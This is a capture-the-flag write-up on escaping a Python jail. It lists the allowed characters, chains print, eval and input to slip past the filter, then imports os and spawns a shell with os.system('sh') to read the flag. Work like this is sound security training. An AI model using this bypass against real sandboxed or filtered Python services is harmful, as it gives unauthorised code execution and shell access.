# jailed

For this challenge, we are given a port to connect to and informed that it is a python jail.  

```py
You get a simple function named 'DATA()'. That's it.
>>> a = DATA()
d
Denied
>>> a = 
```

Starting it up, we are told of a function called DATA(), but for some reason all we get is `Denied` when we try to run it.


Poking around we can find that many characters are completely banned, and some commands that are made of valid chars are also banned.

A list of valid chars is:
- "
- (
- )
- +
- .
- 0
- 1
- 2
- [
- ]
- _
- a
- e
- i
- n
- p
- t
- r
- u
- x
- v
- l

With some experimentation and a list of python built-ins, it is possible to find `print() input() eval()` as usable commands. Combining them into the statement `print(eval(input()))` gives a way to execute code that bypasses some of the filtering.

Now we can finally run data.

```py
>>> a = print(eval(input()))
DATA()
What data do you want to decode?
dfgfhgdsrdfghffd
invalid load key, '7'.
```

And it doesn't work. Oh well. Back to escaping the jail.

Using our bypass technique we can now try to import something.

```py
>>> a = print(eval(input()))
exec("import os")
None
```

It works, then we just need to open a shell.

```py
>>> a = print(eval(input()))
os.system('sh')
ls
flag
jail.py
```

`cat flag` gives us the flag.
